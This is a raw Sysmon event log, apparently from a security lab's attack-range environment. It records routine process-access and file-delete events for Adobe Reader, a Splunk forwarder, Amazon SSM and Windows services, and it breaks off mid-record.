DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\system32\explorerframe.dll+32c5d(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8d5c4|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74cb1|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+77fc2|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.060{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006016C:\Windows\Explorer.EXE{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000047379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.056{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\72d9f526d2e2e7c8_0MD5=EA9FD53597FDC27DE23D0986CD35FCE4,SHA256=158B0A089858AD2370E132B843DB149C85E86999B8DB32C6BB45D85702151B11,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.989{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journalMD5=CB31476C37756582EF1D4920483EF429,SHA256=094C5519474C9AEA1C15B74FCE3B6B606CCD98765E08B6D146F6DC3FE3C926C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:22.977{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journalMD5=37261167265CFA826DC1D2DA9097A0E4,SHA256=A23EC9A0B18E271E040D22B26C8E919D9FC4A619BF849B9235E99C1B2C3651C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018775Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.916{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018774Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.909{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018773Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.908{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018772Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.898{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018771Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.890{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018770Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.888{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018769Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.887{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018768Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.883{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018767Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.882{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018766Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.878{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018765Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.877{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018764Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.870{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018763Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.865{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018762Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.863{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018761Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.854{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018760Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.849{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018759Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.835{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018758Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.831{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018757Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.811{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018756Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.798{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018755Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.783{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018754Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.770{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018753Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.756{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018752Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.673{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 23542300x800000000000000018751Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.667{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-042MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018750Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.651{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018749Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.636{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018748Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:22.606{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program 